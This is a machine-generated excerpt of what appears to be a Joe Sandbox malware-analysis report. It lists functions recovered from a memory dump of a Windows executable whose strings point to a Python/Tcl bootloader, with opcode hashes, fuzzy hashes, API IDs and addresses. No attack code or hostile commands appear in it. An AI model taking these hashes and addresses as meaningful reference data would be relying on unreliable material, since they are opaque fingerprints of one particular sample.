                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 918212764-0
                                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                      • Instruction ID: 5f7c644823ecad3977a076f33701503ba253a164f0843f5d67cb3c72c436e33b
                                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                      • Instruction Fuzzy Hash: 1421C621F1868A41FEA47751B49237D9693AFC4BA0FCD4239D92E477D2EE6CA5834320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                      • Instruction ID: 8457adbed05dcc16fac602bab7320256f34a55d4cc4bf7d0b453f365865f91e0
                                                                                                      • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                      • Instruction Fuzzy Hash: 6141B632D1824987EE34AB19B642179B7A2EBD5750F9C0131D78E436D1EF6DE403CB61
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _fread_nolock
                                                                                                      • String ID:
                                                                                                      • API String ID: 840049012-0
                                                                                                      • Opcode ID: 0452e3aa7aca29920b4941156e71ee71ec49b143be23cefe434c899149b2eae9
                                                                                                      • Instruction ID: 9a73d36a88f46956ac2cefe98d8f99dd461b0dc355dbb1045194c32c83f60f5a
                                                                                                      • Opcode Fuzzy Hash: 0452e3aa7aca29920b4941156e71ee71ec49b143be23cefe434c899149b2eae9
                                                                                                      • Instruction Fuzzy Hash: 96215921B1865A46EF50AB2279057BAD691BF85BD4FCC4430EE0D0B786DE7DE1428620
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                      • Instruction ID: d3377566c4a290148f83e5b08d9e1b9477a7798b61b59d9a6b4378bb60831925
                                                                                                      • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                      • Instruction Fuzzy Hash: E731A262E18A4A85FF217B55E84237CA6A1AFC0BA0FD90135E91D173D2FE7DA4438731
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3947729631-0
                                                                                                      • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                      • Instruction ID: 63c940bfca0ef93d6212bc6022e8f19840fc746f7c1bec0c4c14c0a53c1e328f
                                                                                                      • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                      • Instruction Fuzzy Hash: 4121D172E0474989EF24AF64E4852FC33A5FB84718F980636D75E06AC5EF38D446C750
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                      • Instruction ID: 1f4c32adeb1b2f4b3fd591ca2bdafc1591284dfe70c7ce19c78107fb33e5a5f8
                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                      • Instruction Fuzzy Hash: F6118432E1C64981EE60BF12B40217DE2A6AFC5B84FCC4431EA4C67B96EF7CD4024721
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                      • Instruction ID: 8c22da87bd551e7f5f52ce9233a0d121f18e9df005ef2432ac1b9ee2f22f0de9
                                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                      • Instruction Fuzzy Hash: D921B332A08A4586DF64AF1CE440379B6A0FBC4F64F984234E65D476D5DF3CD8028F10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                      • Instruction ID: c811b8b20c5b8428ec569578ca86bdf7a85d36914d6d4c053110fdb895407104
                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                      • Instruction Fuzzy Hash: 5E017C71E0874980EE04BB63A902069E6A2ABC5FE0F8C4671EE5C17BD6EE3CD4028310
                                                                                                      APIs
                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF757140C90,?,?,?,00007FF7571422FA,?,?,?,?,?,00007FF757143AE9), ref: 00007FF75714D63A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 4292702814-0
                                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                      • Instruction ID: 7fa4206f54e7e6e21412d5d5a1b67ce2f08dc108b971fc1329a4f96b88d7c6ae
                                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                      • Instruction Fuzzy Hash: F6F05810F08A5E50FE643B71780227892924FC57E0FCC0730DE6E862C2FE2CA4828630
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                      • Instruction ID: 2e062a7899b2d8c770f6d4eb47c5d4de061e20ee40037a32683b03d337a4d83c
                                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                      • Instruction Fuzzy Hash: 39311072608B8986EB649F64F8407ED7364FB85744F884039DA4E47B94DF78D549CB20
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                      • Instruction ID: 1545a6de201773774596930bb9727906995b3b1a34cff2e2861ac2ff8700f838
                                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                      • Instruction Fuzzy Hash: EC316236608B8586DB64DF29F8402AEB3A4FBC9754F980135EA9D43B94EF3CD146CB10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227656907-0
                                                                                                      • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                      • Instruction ID: ce3323acb2d3cb7b9293f52fb3562c4447fb6dfb6fa7d6df84e8bab695ca7068
                                                                                                      • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                      • Instruction Fuzzy Hash: 90B1B922B2869A41EE66BB29F5001B9E361EBC4BE4FC85131D95D07B85FE3CE442DB10
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF757135840
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF757135852
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF757135889
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF75713589B
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF7571358B4
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF7571358C6
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF7571358DF
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF7571358F1
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF75713590D
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF75713591F
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF75713593B
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF75713594D
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF757135969
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF75713597B
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF757135997
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF7571359A9
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF7571359C5
                                                                                                      • GetLastError.KERNEL32(?,00007FF7571364CF,?,00007FF75713336E), ref: 00007FF7571359D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLastProc
                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                      • API String ID: 199729137-653951865
                                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                      • Instruction ID: 512c6a5dbed6d3ad41886be5bc78339fab5c32930857ab1571d0393fda87dcaf
                                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                      • Instruction Fuzzy Hash: 6222B66490AB0FD1FE19BF6AB8555B5A3A0AFC5B45FCC1435C42E06260FF3CA54A9B30
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLastProc
                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                      • API String ID: 199729137-3427451314
                                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                      • Instruction ID: 261a211cedd3e89af6c2d90f72439686bf88adf7536e91951f9ee90844384193
                                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                      • Instruction Fuzzy Hash: B202C460A09B0F84FE59BB58B994578A3B1AFC5795FCC0031C46E06260EF3CB58B8B31
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF757139390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7571345F4,00000000,00007FF757131985), ref: 00007FF7571393C9
                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7571386B7,?,?,00000000,00007FF757133CBB), ref: 00007FF75713822C
                                                                                                        • Part of subcall function 00007FF757132810: MessageBoxW.USER32 ref: 00007FF7571328EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                      • API String ID: 1662231829-930877121
                                                                                                      • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                      • Instruction ID: 23ad8382bce522cb97a98ec3b935a654697d6680d3d1da5ab04c016c5d806d4c
                                                                                                      • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                      • Instruction Fuzzy Hash: AC518611A2DA4E81FF54BB25F8516BAE2A1AFD4780FCC4431DA4E476D5EE2CE5078730
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                      • String ID: P%
                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                      • Instruction ID: 515c2861eda3e007e3a6084bc62a7ffdc7d3f3e6ae0a6a2fc3e563a2ab95e51a
                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                      • Instruction Fuzzy Hash: 5551E636604BA186DA38AF26B4185BAF7A1F798B61F444121EBDF43694DF3CD046DB20
